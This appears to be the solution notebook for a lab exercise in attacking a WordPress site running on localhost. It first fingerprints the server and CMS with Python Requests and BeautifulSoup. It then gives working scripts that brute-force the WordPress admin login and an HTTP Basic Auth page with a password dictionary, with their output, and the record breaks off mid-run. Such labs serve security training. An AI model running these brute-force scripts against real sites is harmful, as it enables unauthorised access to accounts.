# Attacking Web Portals Solution

A popular **CMS** is hosted on **port 80** of local machine. Perform the give tasks to complete the challenge. 

**Requests** and **BeautifulSoup** libraries are installed on the machine. A password dictionary "password_dictionary.txt" is present in the working directory. 

## Learn

**Task 1:** Check if web portal is up by using GET request.

In [1]:
import requests

resp = requests.get('http://localhost')

print(resp)

<Response [200]>


**Task 2:** Which server software is being used?

In [2]:
import requests

resp = requests.get('http://localhost')

print(resp.headers.get('server'))

nginx/1.14.0


**Task 3:** Print response headers of the GET response.

In [3]:
import requests

resp = requests.get('http://localhost')

print(resp.headers)

{'Server': 'nginx/1.14.0', 'Date': 'Fri, 21 Sep 2018 07:30:37 GMT', 'Content-Type': 'text/html; charset=UTF-8', 'Transfer-Encoding': 'chunked', 'Connection': 'keep-alive', 'Link': '</wp-json/>; rel="https://api.w.org/"', 'Content-Encoding': 'gzip'}


**Task 4:** Get text content of localhost homepage. Also, can you tell which CMS is running on localhost?

In [5]:
import requests

resp = requests.get('http://localhost')

print(resp.text)


<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">
		<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>
<title>Target WordPress &#8211; Just another WordPress site</title>
<link rel="alternate" type="application/rss+xml" title="Target WordPress &raquo; Feed" href="/feed/" />
<link rel="alternate" type="application/rss+xml" title="Target WordPress &raquo; Comments Feed" href="/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.3"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)return!1;switc

**Answer:** WordPress 

**Task 5:** Print the response in a pretty form using Beautiful Soup.

In [6]:
import requests
from bs4 import BeautifulSoup

resp = requests.get('http://localhost')
soup = BeautifulSoup(resp.text, 'html.parser')

print(soup.prettify())

<!DOCTYPE html>
<html class="no-js" lang="en-US">
 <head>
  <meta charset="utf-8"/>
  <meta content="width=device-width, initial-scale=1" name="viewport"/>
  <link href="http://gmpg.org/xfn/11" rel="profile"/>
  <script>
   (function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);
  </script>
  <title>
   Target WordPress – Just another WordPress site
  </title>
  <link href="/feed/" rel="alternate" title="Target WordPress » Feed" type="application/rss+xml">
   <link href="/comments/feed/" rel="alternate" title="Target WordPress » Comments Feed" type="application/rss+xml"/>
   <script type="text/javascript">
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.3"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)retur

**Task 6:** Print the title of web portal hosted on localhost?

In [15]:
print(soup.title.string)

Target WordPress – Just another WordPress site


**Task 7:** Print the URLs for images present on the homepage.

In [16]:
img_tags = soup.find_all('img')

urls = [img['src'] for img in img_tags]

print(urls)

['http://1.gravatar.com/avatar/1e421ab419b5bee07fe7fba2adc4e22f?s=49&d=mm&r=g']


**Task 8:** Scrape all URLs from the home page of localhost and print unique URLs.

In [18]:
import requests
from bs4 import BeautifulSoup

resp = requests.get("http://localhost")

soup=BeautifulSoup(resp.content,"html.parser")

anchor_list=[a['href'] for a in soup.find_all('a', href=True) if a.text.strip()]

anchor_set = set(anchor_list)

for link in anchor_set:
    print(link)

/
/author/admin/
/2018/07/12/hello-world/#comments
/feed/
#content
/category/uncategorized/
/2018/07/12/hello-world/#comment-1
/comments/feed/
/2018/07/
/wp-login.php
/2018/07/12/hello-world/
https://wordpress.org/


**Task 9:** Can you access the admin section (/wp-admin/) of the CMS?

In [20]:
import requests
from bs4 import BeautifulSoup

resp = requests.get('http://localhost/wp-admin/')
soup = BeautifulSoup(resp.text, 'html.parser')

print(soup.prettify())


<!DOCTYPE html>
<link href="/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load%5B%5D=dashicons,buttons,forms,l10n,login&amp;ver=4.8" media="all" rel="stylesheet" type="text/css"/>
<!--[if IE 8]>
		<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
	<![endif]-->
<!--[if !(IE 8) ]><!-->
<html lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
 <!--<![endif]-->
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/>
  <title>
   Target WordPress ‹ Log In
  </title>
  <link href="http://localhost?redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&amp;reauth=1/wp-admin/load-styles.php?c=0&amp;dir=ltr&amp;load%5B%5D=dashicons,buttons,forms,l10n,login&amp;ver=4.5.3" media="all" rel="stylesheet" type="text/css"/>
  <link href="https://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C300%2C400%2C600&amp;subset=latin%2Clatin-ext&amp;ver=4.5.3" id="open-sans-css" media="all" rel="stylesheet" type="text/css"/>
  <meta content="n

**Answer:** No. If you look closely at the response content, you will observe the login page. So, you have to get correct username and password to access admin area.

## Attack

**Task 10:** Bruteforce the wordpress login for user "admin". Use the given dictionary.

In [25]:
import requests

password_dict="password_dictionary.txt"

# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]

for password in lines:
    print("Trying with password: ",password)
    resp = requests.post('http://localhost/wp-login.php', data = {'log':'admin', 'pwd': password })
    if "ERROR" not in resp.text:
        print("Login successful with password: ",password)
        break

print(resp.text)

Trying with password:  123456
Trying with password:  12345
Trying with password:  1234
Trying with password:  1234567
Trying with password:  dragon
Trying with password:  baseball
Trying with password:  abc123
Trying with password:  letmein
Trying with password:  696969
Trying with password:  shadow
Trying with password:  michael
Trying with password:  654321
Trying with password:  password
Trying with password:  superman
Trying with password:  password1
Login successful with password:  password1
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar"  lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" class="wp-toolbar"  lang="en-US">
<!--<![endif]-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Dashboard &lsaquo; Target WordPress &#8212; WordPress</title>
<script type="text/javascript">
addLoadEvent = function(func){if(typeof jQuery!="undefined")jQuery(document).

**Task 11:** A token is kept at page localhost/token/index.html by user "anon". But, the page is protected. What kind of protection is deployed?

In [23]:
import requests
from bs4 import BeautifulSoup

resp = requests.get('http://localhost/token/index.html')
soup = BeautifulSoup(resp.text, 'html.parser')

print(soup.prettify())

print(resp.headers)

<html>
 <head>
  <title>
   401 Authorization Required
  </title>
 </head>
 <body bgcolor="white">
  <center>
   <h1>
    401 Authorization Required
   </h1>
  </center>
  <hr/>
  <center>
   nginx/1.14.0
  </center>
 </body>
</html>

{'Server': 'nginx/1.14.0', 'Date': 'Fri, 21 Sep 2018 08:10:56 GMT', 'Content-Type': 'text/html', 'Content-Length': '195', 'Connection': 'keep-alive', 'WWW-Authenticate': 'Basic realm="Anon token is here"'}


**Answer:** Basic Auth is used.

**Task 12:** Break the protection and get the token kept at page localhost/token1/index.html

In [6]:
import requests
from bs4 import BeautifulSoup

url='http://localhost/token/index.html'
username='anon'
password_dict="password_dictionary.txt"
timeout=5

# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]

for password in lines:
    print("Trying with password: ",password)
    auth = requests.auth.HTTPBasicAuth(username, password)
    resp = requests.get(url=url, auth=auth, verify=False, timeout=timeout)
    if "Authorization Required" not in str(resp.text):
        print("Login successful with password: ",password)
        soup = BeautifulSoup(resp.text, 'html.parser')
        break

print(soup.prettify())

Trying with password:  123456
Trying with password:  12345
Trying with password:  1234
Trying with password:  1234567
Trying with password:  dragon
Trying with password:  baseball
Trying with password:  abc123
Trying with password:  letmein
Trying with password:  696969
Trying with password:  shadow
Trying with password:  michael
Trying with password:  654321
Trying with password:  password
Trying with password:  superman
Trying with password:  password1
Trying with password:  Password1
Trying with password:  admin
Trying with password:  1qaz2wsx
Trying with password:  7777777
Trying with password:  121212
Trying with password:  000000
Trying with password:  qazwsx
Trying with password:  123qwe
Trying with password:  killer
Trying with password:  trustno1
Trying with password:  jordan
Trying with password:  jennifer
Trying with password:  zxcvbnm
Trying with password:  asdfgh
Trying with password:  hunter
Trying with password:  buster
Trying with password:  soccer
Trying with password: